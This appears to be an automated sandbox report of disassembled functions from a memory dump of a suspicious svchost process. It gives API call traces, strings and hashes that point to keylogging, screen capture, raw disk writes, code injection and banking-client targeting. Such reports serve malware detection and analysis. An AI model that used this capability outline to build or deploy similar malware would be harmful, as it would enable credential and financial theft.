Part of subcall function 02D2C780: CreateRectRgn.GDI32(?,?,02D290B9,?), ref: 02D2C841
Part of subcall function 02D2C780: GetWindowRgn.USER32(00000000,00000000), ref: 02D2C84B
Part of subcall function 02D2C780: OffsetRgn.GDI32(00000000,?,?), ref: 02D2C865
Part of subcall function 02D2C780: SelectClipRgn.GDI32(?,00000000), ref: 02D2C870
Part of subcall function 02D2C780: BitBlt.GDI32(?,?,?,02D290B9,?,?,00000000,00000000,00CC0020), ref: 02D2C899

IsWindow.USER32(?), ref: 02D2CF3E
IsIconic.USER32(?), ref: 02D2CF4D
memset.MSVCRT ref: 02D2CF7E
GetWindowRect.USER32(?,00000000), ref: 02D2CF8B
GetWindowLongA.USER32(?,000000F0), ref: 02D2CFA2
GetScrollBarInfo.USER32(?,000000FA,0000003C,?,75C0BCB0,75BF3EB0), ref: 02D2CFCD
GetScrollBarInfo.USER32(?,000000FB,0000003C,?,75C0BCB0,75BF3EB0), ref: 02D2D005
GetWindow.USER32(?,00000005), ref: 02D2D042
GetWindow.USER32(00000000), ref: 02D2D045

Strings

<, xrefs: 02D2CEA9
<, xrefs: 02D2CFC3

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$InfoRectScroll$Long$Iconicmemset$ClassClipCreateOffsetPrintRedrawSelectVisible
String ID: <$<
API String ID: 3463799249-213342407
Opcode ID: c08271b2fa87e59e433597f00cefcd1d2820af886adf71d54dfc471a671b24cc
Instruction ID: 355dfe19d0298080a36d6dd567c14119b2929e8b8d9b8f986cccbfad7da3a613
Opcode Fuzzy Hash: c08271b2fa87e59e433597f00cefcd1d2820af886adf71d54dfc471a671b24cc
Instruction Fuzzy Hash: 5E611671D052289FDB24DFA8DC88BDEBBB9AF58714F14425AE404A3380DB746D85CFA1

Function 02D421E0 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 165stringsynchronizationsleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D42210
PathFindFileNameA.SHLWAPI(?), ref: 02D4221D
PathFileExistsA.SHLWAPI(ISClient.cfg), ref: 02D42232

Part of subcall function 02D27220: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a1633ec9a,76EEC3F0,?,?,02D322F0,00000000,00000001), ref: 02D27246
Part of subcall function 02D27220: GetFileSizeEx.KERNEL32(00000000,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27264
Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000008,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D2728D
Part of subcall function 02D27220: RtlAllocateHeap.NTDLL(00000000,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27294
Part of subcall function 02D27220: memset.MSVCRT ref: 02D272A7
Part of subcall function 02D27220: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D272D3
Part of subcall function 02D27220: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D272E3
Part of subcall function 02D27220: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D272F2
Part of subcall function 02D27220: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D27305
Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27314
Part of subcall function 02D27220: HeapValidate.KERNEL32(00000000), ref: 02D2731B

StrStrIA.SHLWAPI(00000000,GKUZ=,?,00000000,00000001), ref: 02D4227D
strstr.MSVCRT ref: 02D4229D
strstr.MSVCRT ref: 02D422AF
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D422DE
Sleep.KERNEL32(000003E8), ref: 02D422EF
ReleaseMutex.KERNEL32(00000000), ref: 02D422F6
GetHandleInformation.KERNEL32(00000000,?), ref: 02D42308
CloseHandle.KERNEL32(00000000), ref: 02D42319
GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02D42367
CharUpperA.USER32(?), ref: 02D4237E
CharUpperA.USER32(?), ref: 02D42387

Strings

General, xrefs: 02D4235F
interpro.ini, xrefs: 02D42327
DefaultPrivateDir, xrefs: 02D4235A
GKUZ=, xrefs: 02D42277
ISClient.cfg, xrefs: 02D4222D, 02D42240
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D422D5

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$Heap$CharCreateHandleMutexNamePathProcessUpperstrstr$AllocateCloseExistsFindInformationLockModulePointerPrivateProfileReadReleaseSizeSleepStringUnlockValidatememset
String ID: DefaultPrivateDir$GKUZ=$General$ISClient.cfg$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$interpro.ini
API String ID: 225490952-373839803
Opcode ID: 91a78750e2ba1c59e2fab0cb5ba037e994bf9412bf73ba07b562656cba015e5d
Instruction ID: 25463f70ba1ef4ae6a5aadb3ba72abdb94f8504734fa80db5546b913d4cf3aab
Opcode Fuzzy Hash: 91a78750e2ba1c59e2fab0cb5ba037e994bf9412bf73ba07b562656cba015e5d
Instruction Fuzzy Hash: D25115719403419BD7219B64AC8CBAA7BB9AB05708F548498FDC9A7341DFB4ED88CB70

Function 02D450E0 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 02D450EE
GetWindowDC.USER32(00000000), ref: 02D450F5
CreateCompatibleDC.GDI32(00000000), ref: 02D4510A

Strings

BM, xrefs: 02D4524C
(, xrefs: 02D45162

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$CompatibleCreateDesktop
String ID: ($BM
API String ID: 3720047489-2980357723
Opcode ID: 7864634b6d66a0caff695dcd52ad5ae677557886db7cd46e5a695ab402f2e926
Instruction ID: 297d17170d398268ce1d71e6b7459ff36a1a637990f4577692934fce2d56bead
Opcode Fuzzy Hash: 7864634b6d66a0caff695dcd52ad5ae677557886db7cd46e5a695ab402f2e926
Instruction Fuzzy Hash: 47515FB1D40218AFDB10DFA4E888BAEB7B9FF58710F904559F904AB340DB749D518BB4

Function 02D31660 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 121memorystringCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(\iexplore.exe), ref: 02D3166E
StrStrIA.SHLWAPI(00000000), ref: 02D31675
memset.MSVCRT ref: 02D316F0
IsUserAnAdmin.SHELL32 ref: 02D316F9
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,74DEF550,74DF1620,80000002), ref: 02D31743
HeapValidate.KERNEL32(00000000), ref: 02D31746
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D31753
HeapFree.KERNEL32(00000000), ref: 02D31756
strstr.MSVCRT ref: 02D31766
strstr.MSVCRT ref: 02D31780
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D317AF
HeapValidate.KERNEL32(00000000), ref: 02D317B2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D317BF
HeapFree.KERNEL32(00000000), ref: 02D317C2

Strings

\iexplore.exe, xrefs: 02D31669
set_url , xrefs: 02D31760, 02D31777

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidatestrstr$AdminCommandLineUsermemset
String ID: \iexplore.exe$set_url
API String ID: 2523706361-3242205626
Opcode ID: f2de9f765f0ed08a909e378bfa19bcf59b708f44acd0d07c4a7baaf0b49d36e9
Instruction ID: 440d47f04f5fcdbcb5e8102f4eaf5388f2fa2dfb27331730618ee313b4223f7d
Opcode Fuzzy Hash: f2de9f765f0ed08a909e378bfa19bcf59b708f44acd0d07c4a7baaf0b49d36e9
Instruction Fuzzy Hash: 38310871E8135267E7222670AC8DFAB3B89CF04B55F1C0528E989EB341E6A4CC94C6F1

Function 02D32B50 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 169memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D32B82

Part of subcall function 02D32A90: GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02D32A9E
Part of subcall function 02D32A90: GetWindowTextA.USER32(00000000,?,00000104), ref: 02D32AB9
Part of subcall function 02D32A90: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32B17
Part of subcall function 02D32A90: HeapValidate.KERNEL32(00000000), ref: 02D32B1A
Part of subcall function 02D32A90: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32B27
Part of subcall function 02D32A90: HeapFree.KERNEL32(00000000), ref: 02D32B2A

GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,00000000), ref: 02D32BE5
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D32BEC
memset.MSVCRT ref: 02D32BFF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 02D32C0F
HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02D32C16
GetProcessHeap.KERNEL32(00000008,02D34181,?,?,?,00000000), ref: 02D32C36
HeapReAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D32C3D

Strings

[bks], xrefs: 02D32C78
[tab], xrefs: 02D32CA6
[del], xrefs: 02D32CBB
[ret], xrefs: 02D32C90
[ins], xrefs: 02D32CD0

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocValidatememset$AncestorFreeTextWindow
String ID: [bks]$[del]$[ins]$[ret]$[tab]
API String ID: 4095246728-233650549
Opcode ID: e8e5f3be71106b9bd0e986619d3d0ff64b8bdfcb0c287dd748c8a9f8005efa48
Instruction ID: 1df401c2d6148d921cff689ea6addf401c87f96afb1fa116f6b1648158e7091d
Opcode Fuzzy Hash: e8e5f3be71106b9bd0e986619d3d0ff64b8bdfcb0c287dd748c8a9f8005efa48
Instruction Fuzzy Hash: 7C51AF71D40249ABCB16CF68E85CBEABBB5FF54740F04859AEC859B340E7349E44CBA0

Function 02D21660 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,74DEF550,74DEDF10,75BFBD50), ref: 02D2167A
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D2168B
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 02D2169F
StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02D216C1
GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 02D216D1

Part of subcall function 02D3A040: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A078
Part of subcall function 02D3A040: memcpy.MSVCRT ref: 02D3A0A0
Part of subcall function 02D3A040: VirtualProtect.KERNEL32(00000000,?,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A135
Part of subcall function 02D3A040: VirtualProtect.KERNEL32(?,00000000,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A14A

GetModuleHandleA.KERNEL32(user32.dll), ref: 02D216EC
GetProcAddress.KERNEL32(00000000,GetWindowTextA), ref: 02D216F8

Strings

\explorer.exe, xrefs: 02D216B5
kernel32.dll, xrefs: 02D21686
CreateFileW, xrefs: 02D21699
GetFileAttributesW, xrefs: 02D216CB
GetWindowTextA, xrefs: 02D216F2
user32.dll, xrefs: 02D216E7

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AddressModuleProcVirtual$HandleProtect$AllocFileNamememcpy
String ID: CreateFileW$GetFileAttributesW$GetWindowTextA$\explorer.exe$kernel32.dll$user32.dll
API String ID: 1733008709-77332811
Opcode ID: 347fbaa0070a426a4a2cde0f2db97293662b6f83db37c761b59c93a0ed7abe2a
Instruction ID: d97f098d5fa5f17a0d03c799f749834ec985dd89f8e3f35c5ec4120dd37ea0d8
Opcode Fuzzy Hash: 347fbaa0070a426a4a2cde0f2db97293662b6f83db37c761b59c93a0ed7abe2a
Instruction Fuzzy Hash: 41019671B8136633F52066B57D4AFAA335C6B65E4EF444110BA89F2341EAE8DC4CC978

Function 02D33000 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D33021
GetDriveTypeA.KERNEL32(02D7DFC4,?,?,?), ref: 02D33038
SetCurrentDirectoryA.KERNEL32(02D7DFC4,?,?,?), ref: 02D33048
_snprintf.MSVCRT ref: 02D33075
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02D33097
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,74DE9300), ref: 02D330C1
LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D330D0
WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02D330E9
UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D330FA
GetHandleInformation.KERNEL32(00000000,?), ref: 02D33117
CloseHandle.KERNEL32(00000000), ref: 02D33128

Strings

\\.\PhysicalDrive%u, xrefs: 02D33064

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
String ID: \\.\PhysicalDrive%u
API String ID: 649538874-3292898883
Opcode ID: a9210fcfbc5d337fb8e486cd966105d07c2de794aba8aa31808e2ed028b85ee2
Instruction ID: 44e15a2518fe36251ecab762496b41abbc317175a05c3559495236691651553d
Opcode Fuzzy Hash: a9210fcfbc5d337fb8e486cd966105d07c2de794aba8aa31808e2ed028b85ee2
Instruction Fuzzy Hash: 28310D71980214BBE7329B50ED4DFEA77A89B09B18F508184FA04AA2C0C7F45E84CBF0

Function 02D43910 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D43927
PathFindFileNameA.SHLWAPI(?), ref: 02D43934
GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02D43984
CharUpperA.USER32(?), ref: 02D4399C
CharUpperA.USER32(?), ref: 02D439A5
StrStrIA.SHLWAPI(?,?), ref: 02D439B5

Part of subcall function 02D43770: PathAddBackslashA.SHLWAPI(02D7D098), ref: 02D437A0
Part of subcall function 02D43770: CreateDirectoryA.KERNEL32(?,00000000), ref: 02D437E1
Part of subcall function 02D43770: GetLastError.KERNEL32 ref: 02D437EB
Part of subcall function 02D43770: IsUserAnAdmin.SHELL32 ref: 02D437F3
Part of subcall function 02D43770: PathMakeSystemFolderA.SHLWAPI(?), ref: 02D43804
Part of subcall function 02D43770: SetLastError.KERNEL32(00000000), ref: 02D4380B
Part of subcall function 02D43770: SetCurrentDirectoryA.KERNEL32(?), ref: 02D43818
Part of subcall function 02D43770: PathAddBackslashA.SHLWAPI(02D7D098,?,02D439CC), ref: 02D43887

PathAddBackslashA.SHLWAPI(02D7D098), ref: 02D439D6

Strings

General, xrefs: 02D4397F
interpro.ini, xrefs: 02D43942
DefaultPrivateDir, xrefs: 02D4397A
STF, xrefs: 02D439DC

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$Backslash$CharDirectoryErrorFileLastNameUpper$AdminCreateCurrentFindFolderMakeModulePrivateProfileStringSystemUser
String ID: DefaultPrivateDir$General$STF$interpro.ini
API String ID: 2256374885-2588321666
Opcode ID: 966fe87df5814eb98b8bc0f15d7cb786e86df19403951a67b10e1ead29176c14
Instruction ID: 11687cf0a09c14d54a4508d80a18e12ad71537554f0b75016103c3b726500736
Opcode Fuzzy Hash: 966fe87df5814eb98b8bc0f15d7cb786e86df19403951a67b10e1ead29176c14
Instruction Fuzzy Hash: 341190B59802159BD750EB64ED89EEA7778AB44700F0045C5E5C9A7340EFB4AE88CFB0

Function 02D4D638 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 135filestringCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 02D4D6CA
strchr.MSVCRT ref: 02D4D6D9
MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 02D4D7C5
FindFirstFileW.KERNEL32(?,?), ref: 02D4D7D9

Strings

p, xrefs: 02D4D67D
t, xrefs: 02D4D66B
\, xrefs: 02D4D749
o, xrefs: 02D4D674
Desk, xrefs: 02D4D692
Network Favorites, xrefs: 02D4D68D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
String ID: Desk$Network Favorites$\$o$p$t
API String ID: 23527507-2295261572
Opcode ID: 373ce08331639837de8380799577121c2037b397e4c3cd3b960b0175f328359f
Instruction ID: 6b62d8cdc58d77604a2ba73d88f68961758f3bc965ad396df4f32a0dcc9fb081
Opcode Fuzzy Hash: 373ce08331639837de8380799577121c2037b397e4c3cd3b960b0175f328359f
Instruction Fuzzy Hash: A3413531A0029D5FEF258B24DC54BEA77A2AF41304F2482E5D98EA7341DB71AE85CF60

Function 02D41160 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100threadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D41184
StrStrIA.SHLWAPI(?,cbsmain.dll), ref: 02D41196
GetAncestor.USER32(?,00000002,?,00000104), ref: 02D411B6
GetWindowTextA.USER32(00000000), ref: 02D411BD
CreateThread.KERNEL32(?,?,02D41400,?,?,?), ref: 02D4125E
GetHandleInformation.KERNEL32(00000000,?), ref: 02D41276
CloseHandle.KERNEL32(00000000), ref: 02D41287

Strings

cbsmain.dll, xrefs: 02D4118A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$AncestorCloseCreateFileInformationModuleNameTextThreadWindow
String ID: cbsmain.dll
API String ID: 741776142-1394916644
Opcode ID: 5dfc4474d043f76c83e9d3e1fc383ebd77a3c9c4e3678647953164698b0794d6
Instruction ID: 0bc3570398aaa73b4d97c0a8e4a076a37e791ba99a19c18387ef3ba676a8014d
Opcode Fuzzy Hash: 5dfc4474d043f76c83e9d3e1fc383ebd77a3c9c4e3678647953164698b0794d6
Instruction Fuzzy Hash: 0731D471A442455BD7608F7098CABBA3B699B12344F448684ED89C6381EB76CDCCCA60

Function 02D292D0 Relevance: 13.5, APIs: 9, Instructions: 49clipboardmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?), ref: 02D292DF
GlobalLock.KERNEL32(00000000), ref: 02D292ED
MultiByteToWideChar.KERNEL32(000004E3,00000001,?,?,00000000,?), ref: 02D29306
GlobalUnlock.KERNEL32(00000000), ref: 02D29313
OpenClipboard.USER32(00000000), ref: 02D2931B
GlobalFree.KERNEL32(00000000), ref: 02D29327
EmptyClipboard.USER32 ref: 02D29333
SetClipboardData.USER32(0000000D,00000000), ref: 02D2933C
CloseClipboard.USER32 ref: 02D29342

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
String ID:
API String ID: 1484758812-0
Opcode ID: b6e47a87c67b1964e1a9cf9dd3eaf927a1c138a62e783af866083716e58d0053
Instruction ID: 8cc72b14de63557dfc7578d500969ec82330998e84a82611ef96b274df7a2112
Opcode Fuzzy Hash: b6e47a87c67b1964e1a9cf9dd3eaf927a1c138a62e783af866083716e58d0053
Instruction Fuzzy Hash: 89017C32581215BFEB105BA0FC4CEEEBB6CEF9CB51F848115FA45CA244CBA14C60C6B0

Function 02D2CB80 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 02D2CB88
IsIconic.USER32(00000000), ref: 02D2CB93

Part of subcall function 02D2C780: IsWindow.USER32(00000000), ref: 02D2C79D
Part of subcall function 02D2C780: IsWindowVisible.USER32(00000000), ref: 02D2C7AC
Part of subcall function 02D2C780: GetWindowRect.USER32(00000000,?), ref: 02D2C7E9
Part of subcall function 02D2C780: GetClassLongA.USER32(00000000,000000E6), ref: 02D2C7F2
Part of subcall function 02D2C780: PrintWindow.USER32(00000000,?,00000000,?,?,75BF3EB0,?,?,?,02D290B9), ref: 02D2C805
Part of subcall function 02D2C780: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,?,75BF3EB0,?,?,?,02D290B9), ref: 02D2C82B
Part of subcall function 02D2C780: CreateRectRgn.GDI32(?,?,02D290B9,?), ref: 02D2C841
Part of subcall function 02D2C780: GetWindowRgn.USER32(00000000,00000000), ref: 02D2C84B
Part of subcall function 02D2C780: OffsetRgn.GDI32(00000000,?,?), ref: 02D2C865
Part of subcall function 02D2C780: SelectClipRgn.GDI32(?,00000000), ref: 02D2C870
Part of subcall function 02D2C780: BitBlt.GDI32(?,?,?,02D290B9,?,?,00000000,00000000,00CC0020), ref: 02D2C899

memset.MSVCRT ref: 02D2CBBC

Part of subcall function 02D2CA20: GetWindowRect.USER32(02D2CB54,00000000), ref: 02D2CA2F
Part of subcall function 02D2CA20: GetWindowLongA.USER32(02D2CB54,000000F0), ref: 02D2CA49
Part of subcall function 02D2CA20: GetScrollBarInfo.USER32(02D2CB54,000000FA,?), ref: 02D2CA64
Part of subcall function 02D2CA20: GetScrollBarInfo.USER32(02D2CB54,000000FB,0000003C), ref: 02D2CA91

GetWindow.USER32(00000000,00000005), ref: 02D2CBDD
GetWindow.USER32(00000000), ref: 02D2CBE0

Part of subcall function 02D2CB10: memset.MSVCRT ref: 02D2CB41
Part of subcall function 02D2CB10: GetWindow.USER32(02D2D04D,00000005), ref: 02D2CB5C
Part of subcall function 02D2CB10: GetWindow.USER32(00000000), ref: 02D2CB5F
Part of subcall function 02D2CB10: GetWindow.USER32(02D2D04D,00000003), ref: 02D2CB6A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Rect$InfoLongScrollmemset$ClassClipCreateIconicOffsetPrintRedrawSelectVisible
String ID:
API String ID: 1230479295-0
Opcode ID: e1bc78335e49ccde10d95bbfbdc04319ba6dc9534f213f44a5207fa4767c2d9f
Instruction ID: edd9db0e0694760dcf2c3a4b15a62b04b85841b74c31fcee354c6fc3b8b24af7
Opcode Fuzzy Hash: e1bc78335e49ccde10d95bbfbdc04319ba6dc9534f213f44a5207fa4767c2d9f
Instruction Fuzzy Hash: 27F0C260E902243ADB217B74AC4DFAF3B6C9B11F04F45040BF504E2380EB945C588BB2

Function 02D40320 Relevance: 84.3, APIs: 42, Strings: 6, Instructions: 347memorysleepstringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D40340
PathAddBackslashA.SHLWAPI(5e8dc15b), ref: 02D40367
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D403A5
GetLastError.KERNEL32 ref: 02D403AF
IsUserAnAdmin.SHELL32 ref: 02D403B7
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D403C9
SetLastError.KERNEL32(00000000), ref: 02D403D0
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D4040C
DeleteFileA.KERNEL32(?), ref: 02D4041A
PathAddBackslashA.SHLWAPI(5e8dc15b,?,?), ref: 02D40455
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D4048F
GetLastError.KERNEL32 ref: 02D40499
IsUserAnAdmin.SHELL32 ref: 02D404A1
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D404B0

Part of subcall function 02D48770: UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02D49408,00000000,00000000,75B0A250,?,02D338BD,00000000,00000000,00000000,00000000,?), ref: 02D48797
Part of subcall function 02D48770: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02D49408,00000000,00000000,75B0A250,?,02D338BD,00000000,00000000,00000000,00000000), ref: 02D487B7
Part of subcall function 02D48770: CloseHandle.KERNEL32(?,?,?,02D49408,00000000,00000000,75B0A250,?,02D338BD,00000000,00000000,00000000,00000000), ref: 02D487C8
Part of subcall function 02D48770: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02D49408,00000000,00000000,75B0A250,?,02D338BD,00000000,00000000,00000000,00000000), ref: 02D487E1
Part of subcall function 02D48770: CloseHandle.KERNEL32(?,?,?,02D49408,00000000,00000000,75B0A250,?,02D338BD,00000000,00000000,00000000,00000000), ref: 02D487F2

SetLastError.KERNEL32(00000000), ref: 02D404B7
GetFileAttributesA.KERNEL32(?), ref: 02D404E5
SetCurrentDirectoryA.KERNEL32(?), ref: 02D40510
memset.MSVCRT ref: 02D4055B
lstrcpynA.KERNEL32(?,secret.key,00000104), ref: 02D40575
memset.MSVCRT ref: 02D405B8
